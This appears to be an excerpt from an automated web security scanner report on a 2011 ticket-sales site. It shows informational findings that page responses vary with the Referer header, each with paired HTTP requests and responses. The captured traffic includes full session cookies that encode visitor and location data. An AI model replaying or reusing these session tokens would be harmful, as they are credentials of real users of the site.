If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

18.1. http://bing.fansnap.com/checkout/index/415814268 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/checkout/index/415814268

Request 1

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 19
ETag: "912210bf9f97f8eae912bcb4828410b5"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BH%2FkqNBjoLb2Zmc2V0af6QnQ%3D%3D--976c30f9ab045a1cfd33499b88aa515a33432d71; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11824
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-776896836%3A1342566830275585%3Apgscheckout%7C%252Fcheckout%252Findex%252F415814268%26_ctx%3D%26_ts%3D1311100520%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html' width='1' />
</body>
</html>

Request 2

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 52
ETag: "ed8c1167ba6b89c7b7ac5eb20ca52c6c"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4D2EZ6NBjoLb2Zmc2V0af6QnQ%3D%3D--1d1d68320df3776d4e25bf547f56f252b99b0656; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11611
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-776896836%3A1342566830275585%3Apgscheckout%7C%252Fcheckout%252Findex%252F415814268%26_ctx%3D%26_ts%3D1311100525%26_st%3D%26_ma%3D13%26_ref%3D' width='1' />
</body>
</html>

18.2. http://bing.fansnap.com/checkout/index/418563179 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/checkout/index/418563179

Request 1

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 22
ETag: "a77815d5d483b7d39d35206e9af3772a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CWdhqOBjoLb2Zmc2V0af6QnQ%3D%3D--8f0f6d1603aea2d08c675430159ed90f71b0f19d; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11810
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-776896836%3A1342566830275585%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100533%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html' width='1' />
</body>
</html>

Request 2

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "66e5bc47844c8a9a8f4405e1be2b44aa"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4APrNmOBjoLb2Zmc2V0af6QnQ%3D%3D--34da2ef4767eda18da1f16470dc614e78b069b8d; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11597
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-776896836%3A1342566830275585%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100545%26_st%3D%26_ma%3D13%26_ref%3D' width='1' />
</body>
</html>

18.3. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

Request 1

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:34:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 424
ETag: "13894ec26df92ffcfe8a7d45e8580ead"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311104083; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 19:34:43 GMT
Set-Cookie: _fancat_session=BAh7EjoPc2Vzc2lvbl9pZCIlMDE4M2Q1OWNmMDhkNzQ1OTM2YmM3MzY2ZWUzMzhhYjc6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGkEIRfNFToSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NjgzMDI3NTU4NToRYmdfc3R5bGVfaWRzSSIABjsHRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAROhBzcHZfc3JjXzcwMVQ6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1z2huA5nTDigY6C29mZnNldGn%2BkJ06EXNwdl9zcmNfMTk4N1Q%3D--599dd929144daee7633c9982b135b8d1876ed56b; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 23596
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
var fsurl = document.URL;
if (fsurl.indexOf('?') == -1) {
fsurl += "?mt=sta&sl=true";
} else {
fsurl += "&mt=sta&sl=true";
}

var uetParams = escape("_uid=365762337:9841:pgstickets&_ctx=mt:int;sz:1732;id:389669&_cnt=6&_st=&_tag=mt:int;sz:1732;id:389669&ts=" + new Date().getTime() + "&slLink=true");
var imgTag = '<img src="/la/seats-uet?m='+uetParams+'" height="1px" width="1px" style="position:absolute;"/>';

document.getElementById("sl-pi").innerHTML = imgTag;
var pageNotLoadingDom = document.getElementById("page-not-loading");
if(pageNotLoadingDom){
